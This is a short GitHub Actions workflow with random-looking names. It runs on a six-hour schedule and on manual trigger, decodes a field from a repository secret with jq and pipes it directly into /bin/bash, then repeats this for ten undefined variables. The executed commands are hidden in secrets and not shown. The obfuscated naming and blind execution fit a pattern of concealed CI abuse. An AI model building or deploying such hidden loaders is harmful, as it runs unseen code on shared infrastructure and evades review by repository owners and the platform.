name: baixiaochi1974
on:
  workflow_dispatch:
  schedule:
    - cron: '23 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: baixiaochi1974
        env:
          jwjeb504: ${{ secrets.jwjeb504 }}
        run: |
          echo $jwjeb504 | jq -r .kokja4 | /bin/bash
          echo $cabm3 | jq -r .ttnj44149 | /bin/bash
          echo $pbb172 | jq -r .vn5934 | /bin/bash
          echo $mbcu8 | jq -r .l316 | /bin/bash
          echo $jroy6 | jq -r .mde115 | /bin/bash
          echo $ch1593 | jq -r .ibtnv20863 | /bin/bash
          echo $fsee8 | jq -r .bwf95051 | /bin/bash
          echo $opsy3547 | jq -r .o06329 | /bin/bash
          echo $ji07840 | jq -r .taarg38355 | /bin/bash
          echo $gqw31852 | jq -r .gc558 | /bin/bash
          echo $mp709 | jq -r .fevm8425 | /bin/bash

